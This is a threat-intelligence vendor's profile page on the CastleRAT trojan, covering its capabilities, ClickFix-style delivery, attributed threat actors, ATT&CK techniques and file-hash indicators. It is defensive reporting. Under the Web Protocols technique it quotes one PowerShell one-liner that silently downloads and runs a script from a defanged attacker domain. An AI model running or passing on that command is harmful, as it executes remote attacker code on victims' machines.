Skip to main content
Meet us at Black Hat USA 2026— Las Vegas, August 1–6Book a Meeting
Mallory
Back to malware
MalwareRansomwareUsed by 3 actors

CastleRAT

CastleRAT is a remote access trojan/backdoor first observed in early 2025 and associated primarily with TAG-150, later named GrayBravo. It has been documented in both Python and compiled C variants. High-confidence capabilities described across the source material include system reconnaissance and collection of host information, querying ip-api[.]com for public IP and geolocation data, downloading and executing additional EXE/DLL payloads, executing commands via CMD and PowerShell, and remote shell access. The Python variant was observed as a CastleLoader payload, sends keep-alive messages every three seconds, and can self-delete. The C variant is described as more capable and includes keylogging, screen capture, and theft of browser credentials; other reporting also states CastleRAT can monitor clipboard contents and capture typed input. CastleRAT uses a custom binary protocol with RC4 encryption and hard-coded 16-byte keys for C2 communications. Persistence reported in the content includes registration of a scheduled task to run at startup. Infrastructure tradecraft includes use of Steam Community pages as dead-drop resolvers for covert C2 resolution beginning in late August 2025, and CastleRAT C2 servers have been observed on ports 80, 443, and 7777. Infection and delivery commonly occur through CastleLoader/CastleBot ecosystems and ClickFix-style social engineering, including fake Cloudflare verification/CAPTCHA pages, fraudulent GitHub repositories, and MSI-based chains that trick victims into copying and executing malicious PowerShell commands. CastleRAT has also been observed in campaigns where Shanya-packed loaders or side-loaded DLL chains ultimately deployed it. Reported secondary payload ecosystems around the associated GrayBravo/TAG-150 operations include SectopRAT, WarmCookie, NetSupport RAT, Stealc, RedLine Stealer, Rhadamanthys Stealer, DeerStealer, MonsterV2, and HijackLoader. The malware is linked in the content to financially motivated GrayBravo/TAG-150 activity and, separately, to Iranian state-sponsored MuddyWater operations, with JUMPSEC reporting at least two CastleRAT builds deployed against Israeli targets and warning that detections may overlap with espionage activity. Targeting mentioned in the content includes Israeli targets, logistics-sector victims, hotels in a Booking.com-themed campaign, and broader campaigns affecting government, defense, and other organizations. Reported IOCs directly tied to CastleRAT include SHA-256 hashes 963c012d56c62093d105ab5044517fdcce4ab826f7782b3e377932da1df6896d, f2ff4cbcd6d015af20e4e858b0f216c077ec6d146d3b2e0cbe68b56b3db7a0be, 4ef63fa536134ad296e83e37f9d323beb45087f7d306debdc3e096fed8357395, and 282fa3476294e2b57aa9a8ab4bc1cc00f334197298e4afb2aae812b77e755207.

Share:
For your environment

Hunt this family in your stack

Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.

Start free trial
THREAT ACTORS

Groups observed using it

3 distinct threat actors attributed by public researchers. Open in Mallory to see the full evidence chain and overlapping campaigns.

View more details
GrayBravo

Additionally, Insikt Group has identified a new remote access trojan linked to TAG-150, dubbed CastleRAT. Available in both Python and C variants, CastleRAT's core functionality consists of collecting system information, downloading and executing additional payloads, and executing commands via CMD and PowerShell.

via recorded future blogrecordedfuture.com
MuddyWater

Installer_v1.21.66.msi was built on February 13, 2026, and contains the 'Amy Cherne' code-signing certificate referenced in research tied to MuddyWater, and Russian cybercrime actors using CastleRAT.

via huntio bloghunt.io
Velvet Tempest

...Velvet Tempest ... used a ClickFix lure ... to drop payloads like DonutLoader and CastleRAT.

via the hacker newsthehackernews.com
MITRE ATT&CK

Techniques & procedures

26 distinct techniques documented for this family, organized by ATT&CK tactic.

Initial Access

1 technique
T1566PhishingEvidence2

Infections are most commonly initiated through Cloudflare-themed “ClickFix” phishing attacks or fraudulent GitHub repositories masquerading as legitimate applications.

Execution

5 techniques
T1059Command and Scripting InterpreterEvidence2

Available in both Python and C variants, CastleRAT's core functionality consists of collecting system information, downloading and executing additional payloads, and executing commands via CMD and PowerShell.

T1059.001PowerShellEvidence4

Victims are tricked into copying and executing malicious PowerShell commands on their own devices, thereby enabling the compromise.

T1059.003Windows Command ShellEvidence1

Available in both Python and C variants, CastleRAT's core functionality consists of collecting system information, downloading and executing additional payloads, and executing commands via CMD and PowerShell.

T1204User ExecutionEvidence1

Both versions spread by tricking users into pasting malicious commands through a technique called ClickFix, which uses fake fixes and login prompts.

T1559Inter-Process CommunicationEvidence1

CastleRAT TTPs list includes “Execution T1559 Inter-Process Communication,” and describes a “hidden command interface… through redirected inter-process communication pipes.”

Persistence

1 technique
T1547Boot or Logon Autostart ExecutionEvidence1

It registered for autostart and then executed the clean loader (consent.exe).

Privilege Escalation

2 techniques
T1547Boot or Logon Autostart ExecutionEvidence1

It registered for autostart and then executed the clean loader (consent.exe).

T1548.002Bypass User Account ControlEvidence1

CastleRAT TTPs list includes “Privilege Escalation T1548.002… Bypass User Account Control.” MuddyWater also lists T1548.002.

Stealth

2 techniques
T1070.004File DeletionEvidence2

The following features have been implemented and unchanged since the CastleRAT Python variant was first observed in late July 2025: ... Self-delete

T1218.011Rundll32Evidence1

CastleRAT TTPs list includes “Defense Evasion T1218.011… Rundll32.” MuddyWater also lists “T1218.011… Rundll32.”

Credential Access

1 technique
T1056.001KeyloggingEvidence4

The C variant of CastleRAT also includes more advanced stealing capabilities, such as keylogging and screen capturing.

Discovery

3 techniques
T1082System Information DiscoveryEvidence2

CastleRAT's core functionality consists of collecting system information... The following features have been implemented... Obtain and report country info of the public IP and system information

T1083File and Directory DiscoveryEvidence1

...the C-based iteration, which could facilitate ... file uploads and downloads...

T1614System Location DiscoveryEvidence1

Queries the geolocation API ip-api[.]com to obtain location and other information through the infected host’s public IP address

Collection

5 techniques
T1056.001KeyloggingEvidence4

The C variant of CastleRAT also includes more advanced stealing capabilities, such as keylogging and screen capturing.

T1113Screen CaptureEvidence4

The C variant of CastleRAT also includes more advanced stealing capabilities, such as keylogging and screen capturing.

T1115Clipboard DataEvidence2

...the C-based iteration, which could facilitate ... cryptocurrency clipping...

T1125Video CaptureEvidence1

CastleRAT TTPs list includes “Collection T1125 Video Capture.”

T1185Browser Session HijackingEvidence1

CastleRAT TTPs list includes “Collection T1185 Browser Session Hijacking,” and describes manipulating browser behavior by terminating sessions and silently spawning Chromium instances.

Command and Control

7 techniques
T1071Application Layer ProtocolEvidence4

The infrastructure linked to TAG-150 includes both victim-facing Tier 1 components, such as IP addresses and domains used as command-and-control (C2) servers for multiple malware families...

T1071.001Web ProtocolsEvidence1

Malware name: C2_10a (T1071.001) ... powershell -w h -ep b -c "iex (iwr 'biokdsl[.]com/upd' -useb).Content"

T1095Non-Application Layer ProtocolEvidence1

CastleRAT is a RAT that includes C and Python variants sharing the following commonalities: Custom binary protocol using RC4 encryption with hard-coded 16-byte keys

T1102.001Dead Drop ResolverEvidence2

For example, C2 deaddrops hosted on Steam Community pages is a new development, first observed in late August 2025.

T1105Ingress Tool TransferEvidence6

The upd script downloaded and unpacked the consent.zip archive, which contained the DLL side-loading components.

T1219Remote Access ToolsEvidence2

Insikt Group has identified a new remote access trojan linked to TAG-150, dubbed CastleRAT.

T1568Dynamic ResolutionEvidence1

For example, C2 deaddrops hosted on Steam Community pages is a new development, first observed in late August 2025.

Exfiltration

1 technique
T1041Exfiltration Over C2 ChannelEvidence1

...a pair of CastleRAT trojan variants enabling system data exfiltration, command execution, and further payload deployment...

INDICATORS OF COMPROMISE

IOCs tracked for this family

11 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.

View more in app
Network
6 tracked

IPs, domains, and DNS infrastructure linked to this family.

Hashes
5 tracked

File hashes (MD5, SHA-1, SHA-256) from samples and reports.

TypeValueLatest sighting
ip.v4●●●●●●●●●●●●View more in app4 months ago
hash.sha256●●●●●●●●●●●●View more in app7 months ago
hash.sha256●●●●●●●●●●●●View more in app7 months ago
hash.sha256●●●●●●●●●●●●View more in app7 months ago
hash.sha256●●●●●●●●●●●●View more in app7 months ago
domain●●●●●●●●●●●●View more in app10 months ago
ACTIVITY FEED

Recent activity

26 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.

26 SOURCESView more in app
huntio blogNews
Apr 21, 2026
DinDoor Backdoor: Deno Runtime Abuse and 20 Active C2 Servers

A remote access trojan referenced in relation to the reused 'Amy Cherne' code-signing certificate tied to MuddyWater and Russian cybercrime actors.

Read more
scworldNews
Apr 13, 2026
MuddyWater pays for Russian CastleRAT malware | brief | SC Media

A remote access trojan offered through a Russian malware-as-a-service ecosystem and deployed in this campaign against Israeli targets.

Read more
breakglass intelNews
Apr 9, 2026
CastleLoader / maybedontbanplease[.]com - Breakglass Intelligence - Breakglass Intelligence

Named malware referenced in relation to CastleLoader and TAG150, but no further detail is provided in the content body.

Read more
the hacker newsNews
Apr 8, 2026
Iran-Linked Hackers Disrupt U.S. Critical Infrastructure by Targeting Internet-Exposed PLCs

Remote access trojan used by MuddyWater and described as part of the CastleLoader framework.

Read more
+22 more in the timeline
What this page doesn’t show

The version that knows your environment.

This page is what’s public. Mallory adds the parts that aren’t: which of your assets match these IOCs, which detections are missing, which campaigns to expect next, and what to do in the next 30 minutes.
Start free trial
IOC matching11

Match every observed IP, domain, and hash against your live telemetry.

Threat actor attribution3

Named campaigns wielding this family, with evidence pinned to each claim.

Exploited vulnerabilities

CVEs this family uses for access and lateral movement.

Detection signatures

YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.

MITRE ATT&CK mapping26

Every documented technique, ranked by evidence weight.

Researcher chatter

Reddit, Mastodon, and CTI community discussion around this family.